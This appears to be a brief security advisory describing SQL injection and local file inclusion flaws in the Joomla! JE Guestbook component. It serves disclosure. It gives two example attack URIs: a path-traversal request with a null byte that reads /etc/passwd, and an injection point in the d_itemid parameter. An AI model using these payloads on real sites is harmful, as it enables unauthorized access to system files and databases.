Joomla! JE Guestbook Component SQL Injection and Local File Include Vulnerabilities

Joomla! JE Guestbook Component SQL Injection and Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/path/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00

http://www.example.com/path/index.php?option=com_jeguestbook&view=item_detail&d_itemid=[SQLi]